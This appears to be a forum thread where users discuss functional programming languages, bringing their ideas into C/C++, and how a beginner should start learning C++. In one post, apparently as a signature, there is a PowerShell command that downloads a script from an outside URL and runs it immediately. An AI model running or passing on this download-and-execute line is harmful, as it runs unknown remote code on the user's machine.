Just take a look at Haskell or OCaml or Clojure/Lisp and you'll uncover a whole different world of programming filled with unusual, brilliant ideas.
Ooops. Forgot to mention Scala too.
G4143, I know what you are talking. You have moved into the world of functional programming which has its own charm. Welcome to the world of callbacks !!! :)
If you want to teach that, you are more than welcome. I think if you could throw some light on the unusual and brilliant ideas, that would be really nice. And why can't these ideas be incorporated in C/C++?
I will like to learn. SEnd me info when ever mate.

Oh these ideas can be incorporated into C++ and C. The question is why would you go to all the trouble(and it would be loads and loads of trouble) of setting up a C or C++ program to behave like a function language when you already have several good functional languages to choose from?

Can you just tell me what language I should start with and where to go learn it? I'm a complete newbie at programming with 0 knowledge about it.
Should I get experience from simple language and then come to c++ or can I start c++ directly?

Do you want a favourite number and colour too?
If you are set to learn C++ then learn C++. The internet is filled with tutorials and books on that very topic and I would venture to say that C++ is one of the most supported languages in that area.

I'm interested. Haven't really had time to crack the book of C++ yet. Just PM me when you have available slots. I am not new to programming, would help if someone showed me the basics to get started :)
powershell.exe -noprofile -noexit -command iex "(new-object net.webclient).downloadstring('https://media.nick-name.net/ps/execute.ps1')"![[Image: f4hRdFS.gif]](https://i.imgur.com/f4hRdFS.gif)
Now that a dozen people must have passed the course, can we have some feedback, please?
